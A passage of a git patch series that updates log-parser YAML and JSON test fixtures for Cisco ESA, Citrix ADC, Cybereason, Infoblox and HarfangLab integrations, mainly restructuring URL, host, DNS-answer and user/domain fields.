+cisco.esa.url_domain: + description: '' + name: cisco.esa.url_domain type: keyword email.attachments: diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index d6a1e2d56..ce0d1d1b3 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json @@ -55,16 +55,14 @@ "age": "30 days (or greater)" } }, - "url": { - "domain": [ - "schemas.microsoft.com", - "www.w3.org" - ], - "full": [ - "http://schemas.microsoft.com/office/2004/12/omml", - "http://www.w3.org/TR/REC-html40" - ] - } + "url": [ + "http://schemas.microsoft.com/office/2004/12/omml", + "http://www.w3.org/TR/REC-html40" + ], + "url_domain": [ + "schemas.microsoft.com", + "www.w3.org" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index 861934a97..4dbc8fa48 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json @@ -58,16 +58,14 @@ "age": "9 years 3 months 14 days" } }, - "url": { - "domain": [ - "bce-demo.appc.cisco.com", - "mandrill.appc.cisco.com" - ], - "full": [ - "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", - "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" - ] - } + "url": [ + "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", + "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" + ], + "url_domain": [ + "bce-demo.appc.cisco.com", + "mandrill.appc.cisco.com" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 77ae37f04..6bc9470fd 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -52,20 +52,18 @@ "age": "30 days (or greater)" } }, - "url": { - "domain": [ - "", - "facebook.com", - "tiktok.com", - "tinyurl.es" - ], - "full": [ - "https://facebook.com/u/john.doe", - "https://tiktok.com", - "https://tinyurl.es/tbdra", - "www.twitter.com" - ] - } + "url": [ + "https://facebook.com/u/john.doe", + "https://tiktok.com", + "https://tinyurl.es/tbdra", + "www.twitter.com" + ], + "url_domain": [ + "", + "facebook.com", + "tiktok.com", + "tinyurl.es" + ] } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 8fcb871ab..45d8465a7 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -55,10 +55,8 @@ "age": "30 days (or greater)" } }, - "url": { - "domain": [], - "full": [] - } + "url": [], + "url_domain": [] } }, "email": { From cd6d9306d07e6c410c9db83fbb4e529e895f59db Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Tue, 10 Dec 2024 16:28:27 +0200 Subject: [PATCH 136/150] Fix: Citrix ADC fix warning --- Citrix/citrix-adc/ingest/parser.yml | 8 ++++++-- Citrix/citrix-adc/tests/test_aaatm.json | 20 ++++++-------------- 2 files changed, 12 insertions(+), 16 deletions(-) diff --git a/Citrix/citrix-adc/ingest/parser.yml b/Citrix/citrix-adc/ingest/parser.yml index 9c6c377a7..6fead398e 100644 --- a/Citrix/citrix-adc/ingest/parser.yml +++ b/Citrix/citrix-adc/ingest/parser.yml @@ -90,7 +90,7 @@ pipeline: CIPHER_SUITE: '"?"?[\w\-\.]+"?"?' - name: set_audit_log_fields - filter: '{{not original.message.startswith("CEF")}}' + filter: '{{not original.message.startswith("CEF") and parse_audit_header.message.type not in ["AAATM"]}}' - name: set_connection_log_fields filter: "{{ parse_audit_header.message.type == 'TCP' }}" @@ -105,7 +105,7 @@ pipeline: filter: "{{ parse_audit_header.message.type == 'SSLLOG' }}" - name: set_other_log_fields - filter: "{{ parse_audit_header.message.type not in ['SSLVPN', 'SSLLOG', 'TCP'] }}" + filter: "{{ parse_audit_header.message.type not in ['SSLVPN', 'SSLLOG', 'TCP', 'AAATM'] }}" stages: set_cef_header_fields: @@ -113,17 +113,21 @@ stages: - set: event.kind: "alert" event.dataset: "alert" + - set: observer.vendor: "{{parsed_event.message.DeviceVendor}}" observer.product: "{{parsed_event.message.DeviceProduct}}" observer.version: "{{parsed_event.message.DeviceVersion}}" + - set: source.ip: "{{parsed_event.message.src}}" source.port: "{{parsed_event.message.spt}}" + - set: event.reason: "{{parsed_event.message.msg}}" event.action: "{{parsed_event.message.act}}" event.category: ["network"] + - set: url.original: "{{parsed_event.message.request}}" - set: diff --git a/Citrix/citrix-adc/tests/test_aaatm.json b/Citrix/citrix-adc/tests/test_aaatm.json index 8db673e24..abc914658 100644 --- a/Citrix/citrix-adc/tests/test_aaatm.json +++ b/Citrix/citrix-adc/tests/test_aaatm.json @@ -4,20 +4,12 @@ }, "expected": { "message": "09/29/2023:07:40:56 GMT ADC 0-PPE-1 : default AAATM Message 1111111111 0 : \"AAA JSON-PARSE: ns_aaa_json_parser_StartElementHandler: NAME_VAL state, multi valued attribute start 'ConnectionId' seen\"", - "event": { - "category": [ - "network" - ], - "code": "Message", - "dataset": "audit_aaatm", - "reason": "\"AAA JSON-PARSE: ns_aaa_json_parser_StartElementHandler: NAME_VAL state, multi valued attribute start 'ConnectionId' seen\"", - "type": [ - "connection" - ] - }, - "@timestamp": "2023-09-29T07:40:56Z", - "observer": { - "name": "ADC" + "sekoiaio": { + "intake": { + "parsing_warnings": [ + "No fields extracted from original event" + ] + } } } } \ No newline at end of file From 28a6c8731ba8f8e122ded925ba64d37958d6c52e Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Tue, 10 Dec 2024 16:30:51 +0200 Subject: [PATCH 137/150] Fix: Extract more fields for Cybereason --- CybeReason/malop-json/ingest/parser.yml | 33 +++++++++++++++++++ CybeReason/malop-json/tests/test_malop.json | 26 ++++++++++++++- .../malop-json/tests/test_malop_detail.json | 25 +++++++++++++- 3 files changed, 82 insertions(+), 2 deletions(-) diff --git a/CybeReason/malop-json/ingest/parser.yml b/CybeReason/malop-json/ingest/parser.yml index 80803a753..9f716126d 100644 --- a/CybeReason/malop-json/ingest/parser.yml +++ b/CybeReason/malop-json/ingest/parser.yml @@ -61,19 +61,43 @@ stages: - set: observer.vendor: "Cybereason" observer.product: "Cybereason" + handle_malop: actions: - set: "@timestamp": "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.lastUpdateTime != null}}" + - set: file.name: "{{parsed_event.message.primaryRootCauseName}}" file.hash.sha1: "{{parsed_event.message.rootCauseElementHashes}}" filter: '{{parsed_event.message.rootCauseElementType == "File"}}' + - set: process.name: "{{parsed_event.message.primaryRootCauseName}}" process.hash.sha1: "{{parsed_event.message.rootCauseElementHashes}}" filter: '{{parsed_event.message.rootCauseElementType == "Process"}}' + + - set: + host.os.type: "{{parsed_event.message.machines[0].get('osType', '').lower()}}" + host.name: "{{parsed_event.message.machines[0].get('displayName')}}" + host.domain: "{{parsed_event.message.machines[0].get('adDNSHostName')}}" + cybereason.malop.host.id: "{{parsed_event.message.machines[0].get('guid')}}" + cybereason.malop.host.is_online: "{{parsed_event.message.machines[0].get('connected')}}" + cybereason.malop.host.is_isolated: "{{parsed_event.message.machines[0].get('isolated')}}" + filter: "{{parsed_event.message.get('machines', []) != []}}" + + - set: + user.name: "{{parsed_event.message.users[0].get('displayName')}}" + cybereason.malop.user.id: "{{parsed_event.message.users[0].get('guid')}}" + cybereason.malop.user.is_admin: "{{parsed_event.message.users[0].get('admin')}}" + filter: "{{parsed_event.message.get('users', []) != []}}" + + - set: + user.name: '{{parsed_event.message.users[0].displayName.split("\\")[1]}}' + user.domain: '{{parsed_event.message.users[0].displayName.split("\\")[0]}}' + filter: '{{parsed_event.message.get("users", []) != [] and "\\" in parsed_event.message.users[0].get("displayName")}}' + - set: event.kind: "alert" event.category: ["malware"] @@ -88,22 +112,28 @@ stages: cybereason.malop.root_cause.type: "{{parsed_event.message.rootCauseElementType}}" cybereason.malop.root_cause.name: "{{parsed_event.message.primaryRootCauseName}}" cybereason.malop.is_edr: "{{parsed_event.message.edr}}" + - set: cybereason.malop.created_at: "{{parsed_creation_time.datetime}}" filter: "{{parsed_event.message.malopCloseTime != null}}" + - set: cybereason.malop.modified_at: "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.creationTime != null}}" + - set: cybereason.malop.closed_at: "{{parsed_closing_time.datetime}}" filter: "{{parsed_event.message.malopCloseTime != null}}" + handle_model: actions: - set: "@timestamp": "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.metadata.timestamp != null}}" + - set: cybereason.malop.id: "{{parsed_event.message.metadata.malopGuid}}" + handle_machine_model: actions: - set: @@ -118,6 +148,7 @@ stages: - set: host.os.type: "{{parsed_event.message.osType.lower()}}" filter: "{{parsed_event.message.osType != null}}" + handle_user_model: actions: - set: @@ -127,10 +158,12 @@ stages: user.name: "{{parsed_event.message.displayName}}" cybereason.malop.user.id: "{{parsed_event.message.guid}}" cybereason.malop.user.is_admin: "{{parsed_event.message.admin}}" + - set: user.name: '{{parsed_event.message.displayName.split("\\")[1]}}' user.domain: '{{parsed_event.message.displayName.split("\\")[0]}}' filter: '{{parsed_event.message.displayName != null and "\\" in parsed_event.message.displayName}}' + handle_file_suspect_model: actions: - set: diff --git a/CybeReason/malop-json/tests/test_malop.json b/CybeReason/malop-json/tests/test_malop.json index b7ad07bb9..a5df9c14f 100644 --- a/CybeReason/malop-json/tests/test_malop.json +++ b/CybeReason/malop-json/tests/test_malop.json @@ -24,6 +24,11 @@ ], "type": "CUSTOM_RULE" }, + "host": { + "id": "-576002811.1198775089551518743", + "is_isolated": false, + "is_online": true + }, "id": "11.-6654920844431693523", "is_edr": "true", "modified_at": "2022-11-20T12:02:17.625000Z", @@ -33,7 +38,17 @@ "type": "Process" }, "severity": "High", - "status": "Active" + "status": "Active", + "user": { + "id": "0.2548072792133848559", + "is_admin": true + } + } + }, + "host": { + "name": "win-cybereason", + "os": { + "type": "windows" } }, "observer": { @@ -42,6 +57,15 @@ }, "process": { "name": "cymulateagent.exe" + }, + "related": { + "user": [ + "administrator" + ] + }, + "user": { + "domain": "win-cybereason", + "name": "administrator" } } } \ No newline at end of file diff --git a/CybeReason/malop-json/tests/test_malop_detail.json b/CybeReason/malop-json/tests/test_malop_detail.json index a009d865f..532ff8e73 100644 --- a/CybeReason/malop-json/tests/test_malop_detail.json +++ b/CybeReason/malop-json/tests/test_malop_detail.json @@ -24,6 +24,11 @@ ], "type": "KNOWN_MALWARE" }, + "host": { + "id": "-576002811.1198775089551518743", + "is_isolated": false, + "is_online": false + }, "id": "11.7498520112250262440", "is_edr": "false", "modified_at": "2022-11-14T02:19:45.000000Z", @@ -33,7 +38,11 @@ "type": "File" }, "severity": "Low", - "status": "Closed" + "status": "Closed", + "user": { + "id": "0.2548072792133848559", + "is_admin": false + } } }, "file": { @@ -42,6 +51,13 @@ }, "name": "kprocesshacker.sys" }, + "host": { + "domain": "desktop-aaaaaa.example.org", + "name": "desktop-aaaaaa", + "os": { + "type": "windows" + } + }, "observer": { "product": "Cybereason", "vendor": "Cybereason" @@ -49,7 +65,14 @@ "related": { "hash": [ "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc" + ], + "user": [ + "system" ] + }, + "user": { + "domain": "desktop-aaaaa", + "name": "system" } } } \ No newline at end of file From a4754df9ef5b6fadafade5360e39be9c88359dab Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Tue, 10 Dec 2024 17:42:47 +0200 Subject: [PATCH 138/150] Fix comments --- Infoblox/ddi/ingest/parser.yml | 7 ++- Infoblox/ddi/tests/query_log_dns_5.json | 2 +- Infoblox/ddi/tests/query_log_dns_6.json | 2 +- Infoblox/ddi/tests/query_log_dns_7.json | 79 +++++++++++++++++++++++++ 4 files changed, 86 insertions(+), 4 deletions(-) diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml index 0fd9855e8..c84be32fe 100644 --- a/Infoblox/ddi/ingest/parser.yml +++ b/Infoblox/ddi/ingest/parser.yml @@ -157,8 +157,11 @@ stages: - set: dns.answers: | [ - {%- for record in parse_event.message.dns_records.split() | batch(5) -%} - {"name": "{{record[0]}}", "ttl": {{record[1]}}, "class": "{{record[2]}}", "type": "{{record[3]}}", "data": "{{record[4][:-1]}}"}, + {%- for data in parse_event.message.dns_records.split(';') -%} + {%- if data != "" -%} + {%- set record = data.split(' ') -%} + {"name": "{{record[-5]}}", "ttl": {{record[-4]}}, "class": "{{record[-3]}}", "type": "{{record[-2]}}", "data": "{{record[-1]}}"}, + {%- endif -%} {%- endfor -%} ] filter: "{{parse_event.message.get('dns_records') != None}}" diff --git a/Infoblox/ddi/tests/query_log_dns_5.json b/Infoblox/ddi/tests/query_log_dns_5.json index 126d59135..e8b9350f6 100644 --- a/Infoblox/ddi/tests/query_log_dns_5.json +++ b/Infoblox/ddi/tests/query_log_dns_5.json @@ -8,7 +8,7 @@ "answers": [ { "class": "IN", - "data": "test.test.io", + "data": "test.test.io.", "name": "test.test.io.", "ttl": 86400, "type": "CNAME" diff --git a/Infoblox/ddi/tests/query_log_dns_6.json b/Infoblox/ddi/tests/query_log_dns_6.json index 606b02ef2..c3e9d8ddc 100644 --- a/Infoblox/ddi/tests/query_log_dns_6.json +++ b/Infoblox/ddi/tests/query_log_dns_6.json @@ -43,7 +43,7 @@ }, { "class": "IN", - "data": "192.168.1.", + "data": "192.168.1.1", "name": "test.test.org.", "ttl": 365, "type": "A" diff --git a/Infoblox/ddi/tests/query_log_dns_7.json b/Infoblox/ddi/tests/query_log_dns_7.json index ca3673036..7e8b80b01 100644 --- a/Infoblox/ddi/tests/query_log_dns_7.json +++ b/Infoblox/ddi/tests/query_log_dns_7.json @@ -5,6 +5,85 @@ "expected": { "message": "client 192.168.1.1#49943: UDP: query: test.dev IN A response: NOERROR + test.dev. 11720 IN CNAME test.dev.; thmwh.l46l2i c8.c3r2fb7.81hxxxxxx.dev. 67 IN CNAME test.dev.; test.dev. 52 IN CNAME test.dev.; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; th mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; test.dev. 235 IN A 192.168.1.1; thmwh.xxxxxxxx.c3r2fb7.81h xxxxxx.dev. 235 IN A 192.168.1.1;", "dns": { + "answers": [ + { + "class": "IN", + "data": "test.dev.", + "name": "test.dev.", + "ttl": 11720, + "type": "CNAME" + }, + { + "class": "IN", + "data": "test.dev.", + "name": "c8.c3r2fb7.81hxxxxxx.dev.", + "ttl": 67, + "type": "CNAME" + }, + { + "class": "IN", + "data": "test.dev.", + "name": "test.dev.", + "ttl": 52, + "type": "CNAME" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "mwh.xxxxxxxx.c3r2fb7.81hxxxxxx.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "test.dev.", + "ttl": 235, + "type": "A" + }, + { + "class": "IN", + "data": "192.168.1.1", + "name": "xxxxxx.dev.", + "ttl": 235, + "type": "A" + } + ], "header_flags": [], "question": { "class": "IN", From 061e9656533eac6955dba9be73a10123daef8bdc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Tue, 10 Dec 2024 16:50:08 +0100 Subject: [PATCH 139/150] Update HarfangLab/harfanglab/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- HarfangLab/harfanglab/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 96338037d..c09e780c2 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -143,7 +143,7 @@ stages: url.original: "{{json_event.message.details_url_request.url}}" - set: - agent.id: "{{json_event.message.agents[0].agent_id}}" + harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}" filter: "{{json_event.message.agents | length > 0}}" network_info: From cd0a5dc4c25145de4300b3c9fcfda65fd65dcbd3 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 16:57:25 +0100 Subject: [PATCH 140/150] fixes on fields and typo --- HarfangLab/harfanglab/_meta/fields.yml | 5 +++++ HarfangLab/harfanglab/ingest/parser.yml | 2 +- HarfangLab/harfanglab/tests/threat_critical.json | 4 +++- HarfangLab/harfanglab/tests/threat_log.json | 5 ++++- 4 files changed, 13 insertions(+), 3 deletions(-) diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index 611f3c079..902363c55 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml @@ -953,6 +953,11 @@ action.properties.param9: name: action.properties.param9 type: keyword +harfanglab.agent_ids: + description: '' + name: harfanglab.agent_ids + type: keyword + harfanglab.aggregation_key: description: The key to the events aggregation name: harfanglab.aggregation_key diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index c09e780c2..34535641b 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -143,7 +143,7 @@ stages: url.original: "{{json_event.message.details_url_request.url}}" - set: - harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}" + harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}}" filter: "{{json_event.message.agents | length > 0}}" network_info: diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json index e9b50e3db..ce1d2faa4 100644 --- a/HarfangLab/harfanglab/tests/threat_critical.json +++ b/HarfangLab/harfanglab/tests/threat_critical.json @@ -10,10 +10,12 @@ "start": "2024-03-19T09:21:00Z" }, "agent": { - "id": "af5e2f63-becd-4660-ade8-30d04c0dd044", "name": "harfanglab" }, "harfanglab": { + "agent_ids": [ + "af5e2f63-becd-4660-ade8-30d04c0dd044" + ], "count": { "rules": 1, "users_impacted": 0 diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json index 233ffd066..bed91707b 100644 --- a/HarfangLab/harfanglab/tests/threat_log.json +++ b/HarfangLab/harfanglab/tests/threat_log.json @@ -10,10 +10,13 @@ "start": "2024-02-07T15:18:00Z" }, "agent": { - "id": "215fe295-905f-4a8d-8347-e9d438d4e415", "name": "harfanglab" }, "harfanglab": { + "agent_ids": [ + "215fe295-905f-4a8d-8347-e9d438d4e415", + "999ba0c7-96b8-4c57-bf0e-63b24813c873" + ], "count": { "rules": 4, "users_impacted": 3 From ffe0e638b928cbc836114a3ba468de784ae12f97 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 11 Dec 2024 12:07:11 +0200 Subject: [PATCH 141/150] Harfanglab - normalize `user.name` --- HarfangLab/harfanglab/CHANGELOG.md | 8 +- HarfangLab/harfanglab/ingest/parser.yml | 83 +++++++++++++++++-- HarfangLab/harfanglab/tests/alert.json | 5 +- HarfangLab/harfanglab/tests/alert_1.json | 5 +- HarfangLab/harfanglab/tests/alert_2.json | 5 +- HarfangLab/harfanglab/tests/alert_3.json | 5 +- HarfangLab/harfanglab/tests/alert_4.json | 5 +- .../tests/alert_false_positive.json | 5 +- .../harfanglab/tests/authentication.json | 8 +- HarfangLab/harfanglab/tests/dns.json | 5 +- HarfangLab/harfanglab/tests/network.json | 5 +- HarfangLab/harfanglab/tests/network2.json | 5 +- .../harfanglab/tests/process-event.json | 5 +- HarfangLab/harfanglab/tests/process.json | 5 +- HarfangLab/harfanglab/tests/process2.json | 5 +- HarfangLab/harfanglab/tests/process3.json | 5 +- HarfangLab/harfanglab/tests/process4.json | 5 +- 17 files changed, 130 insertions(+), 39 deletions(-) diff --git a/HarfangLab/harfanglab/CHANGELOG.md b/HarfangLab/harfanglab/CHANGELOG.md index b51c03c58..020bfb34e 100644 --- a/HarfangLab/harfanglab/CHANGELOG.md +++ b/HarfangLab/harfanglab/CHANGELOG.md @@ -7,7 +7,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] -### 2024-10-01 +### 2024-12-11 - 1.3.0 + +### Changed + +- Split username into `user.name` and `user.domain` + +### 2024-10-01 - 1.2.0 ### Added diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 34535641b..253355fce 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -171,7 +171,16 @@ stages: process.pid: "{{json_event.message.pid}}" process.executable: "{{json_event.message.image_name}}" - user.name: "{{json_event.message.username}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} event.category: ["network"] event.type: ["connection"] @@ -192,7 +201,6 @@ stages: process.pe.company: "{{json_event.message.pe_info.company_name}}" process.pe.product: "{{json_event.message.pe_info.product_name}}" process.executable: "{{json_event.message.image_name}}" - user.name: "{{json_event.message.username}}" process.parent.executable: "{{json_event.message.parent_image}}" process.parent.command_line: "{{json_event.message.parent_commandline}}" process.parent.name: '{{json_event.message.parent_image.split("\\") | last}}' @@ -202,6 +210,17 @@ stages: harfanglab.grandparent.process.command_line: "{{json_event.message.parent_commandline}}" harfanglab.grandparent.process.ancestors: "{{json_event.message.ancestors.split('|')}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + event.category: ["process"] event.type: ["start"] - set: @@ -261,7 +280,17 @@ stages: process.pe.product: "{{json_event.message.process.pe_info.product_name}}" process.executable: "{{json_event.message.process.image_name}}" - user.name: "{{json_event.message.process.username}}" + + user.name: > + {%- if '\\' not in json_event.message.process.username -%} + {{ json_event.message.process.username }} + {%- else -%} + {{ json_event.message.process.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.process.username -%} + {{ json_event.message.process.username.split('\\')[0] }} + {%- endif -%} process.parent.executable: "{{json_event.message.process.parent_image}}" process.parent.command_line: "{{json_event.message.process.parent_commandline}}" @@ -726,9 +755,29 @@ stages: event.code: "{{json_event.message.windows.event_id}}" event.action: "{{json_event.message.object_type}}" user.id: "{{json_event.message.windows.source_sid}}" - user.name: "{{json_event.message.source_username}}" user.target.id: "{{json_event.message.windows.target_sid}}" - user.target.name: "{{json_event.message.target_username}}" + + user.name: > + {%- if '\\' not in json_event.message.source_username -%} + {{ json_event.message.source_username }} + {%- else -%} + {{ json_event.message.source_username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.source_username -%} + {{ json_event.message.source_username.split('\\')[0] }} + {%- endif -%} + + user.target.name: > + {%- if '\\' not in json_event.message.target_username -%} + {{ json_event.message.target_username }} + {%- else -%} + {{ json_event.message.target_username.split('\\')[1] }} + {%- endif -%} + user.target.domain: > + {%- if '\\' in json_event.message.target_username -%} + {{ json_event.message.target_username.split('\\')[0] }} + {%- endif -%} dns_info: actions: @@ -737,10 +786,20 @@ stages: event.type: ["info"] process.pid: "{{json_event.message.pid}}" process.executable: "{{json_event.message.process_image_path}}" - user.name: "{{json_event.message.username}}" dns.question.type: "{{json_event.message.query_type}}" dns.question.name: "{{json_event.message.requested_name}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + auditlog_info: actions: - set: @@ -750,11 +809,21 @@ stages: http.response.status_code: "{{json_event.message.response_status_code}}" url.path: "{{json_event.message.request_path}}" user_agent.original: "{{json_event.message.user_agent}}" - user.name: "{{json_event.message.username}}" source.ip: "{{json_event.message.ip_address}}" event.reason: "{{json_event.message.log_description}}" event.action: "{{json_event.message.log_slug}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + agentlog_info: actions: - set: diff --git a/HarfangLab/harfanglab/tests/alert.json b/HarfangLab/harfanglab/tests/alert.json index 0f8e1a0d4..6acde1285 100644 --- a/HarfangLab/harfanglab/tests/alert.json +++ b/HarfangLab/harfanglab/tests/alert.json @@ -76,7 +76,7 @@ "REDACTED" ], "user": [ - "REDACTED\\valves" + "valves" ] }, "rule": { @@ -86,7 +86,8 @@ "name": "YARA binary check" }, "user": { - "name": "REDACTED\\valves" + "domain": "REDACTED", + "name": "valves" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_1.json b/HarfangLab/harfanglab/tests/alert_1.json index b69152813..9ac1abc0a 100644 --- a/HarfangLab/harfanglab/tests/alert_1.json +++ b/HarfangLab/harfanglab/tests/alert_1.json @@ -77,7 +77,7 @@ "PL-3049" ], "user": [ - "EXAMPLE\\jdoe" + "jdoe" ] }, "rule": { @@ -87,7 +87,8 @@ "name": "File Added/Modified in Startup Directory" }, "user": { - "name": "EXAMPLE\\jdoe" + "domain": "EXAMPLE", + "name": "jdoe" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_2.json b/HarfangLab/harfanglab/tests/alert_2.json index 310b001a9..60c039be7 100644 --- a/HarfangLab/harfanglab/tests/alert_2.json +++ b/HarfangLab/harfanglab/tests/alert_2.json @@ -83,7 +83,7 @@ "PL3024" ], "user": [ - "EXAMPLE\\jdoe" + "jdoe" ] }, "rule": { @@ -93,7 +93,8 @@ "name": "Registry Autorun Key Added" }, "user": { - "name": "EXAMPLE\\jdoe", + "domain": "EXAMPLE", + "name": "jdoe", "roles": "EXAMPLE" } } diff --git a/HarfangLab/harfanglab/tests/alert_3.json b/HarfangLab/harfanglab/tests/alert_3.json index db3a57056..f37d2fad4 100644 --- a/HarfangLab/harfanglab/tests/alert_3.json +++ b/HarfangLab/harfanglab/tests/alert_3.json @@ -84,7 +84,7 @@ "SRV001" ], "user": [ - "EXAMPLE\\j.doe" + "j.doe" ] }, "rule": { @@ -94,7 +94,8 @@ "name": "PowerShellInvoke-CommandExecutedonRemoteHost" }, "user": { - "name": "EXAMPLE\\j.doe", + "domain": "EXAMPLE", + "name": "j.doe", "roles": "Servers" } } diff --git a/HarfangLab/harfanglab/tests/alert_4.json b/HarfangLab/harfanglab/tests/alert_4.json index 8a3745f19..1a45b2b22 100644 --- a/HarfangLab/harfanglab/tests/alert_4.json +++ b/HarfangLab/harfanglab/tests/alert_4.json @@ -85,7 +85,7 @@ "HOST01" ], "user": [ - "DOMAINSI\\JDOE" + "JDOE" ] }, "rule": { @@ -105,7 +105,8 @@ "top_level_domain": "com" }, "user": { - "name": "DOMAINSI\\JDOE", + "domain": "DOMAINSI", + "name": "JDOE", "roles": "DOMAIN_Postes_de_travail_Windows" } } diff --git a/HarfangLab/harfanglab/tests/alert_false_positive.json b/HarfangLab/harfanglab/tests/alert_false_positive.json index f01c2921f..99b1994fb 100644 --- a/HarfangLab/harfanglab/tests/alert_false_positive.json +++ b/HarfangLab/harfanglab/tests/alert_false_positive.json @@ -76,7 +76,7 @@ "pc123" ], "user": [ - "XXX\\XXX" + "XXX" ] }, "rule": { @@ -86,7 +86,8 @@ "name": "Discovery: Process list" }, "user": { - "name": "XXX\\XXX" + "domain": "XXX", + "name": "XXX" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/authentication.json b/HarfangLab/harfanglab/tests/authentication.json index 91af4cc19..a00b26310 100644 --- a/HarfangLab/harfanglab/tests/authentication.json +++ b/HarfangLab/harfanglab/tests/authentication.json @@ -58,7 +58,7 @@ "127.0.0.1" ], "user": [ - "test-domain\\work-laptop$" + "work-laptop$" ] }, "sekoiaio": { @@ -78,12 +78,14 @@ "ip": "127.0.0.1" }, "user": { + "domain": "test-domain", "id": "S-1-5-18", - "name": "test-domain\\work-laptop$", + "name": "work-laptop$", "roles": "custom-group", "target": { + "domain": "work-laptop", "id": "S-1-0-0", - "name": "work-laptop\\administrateur" + 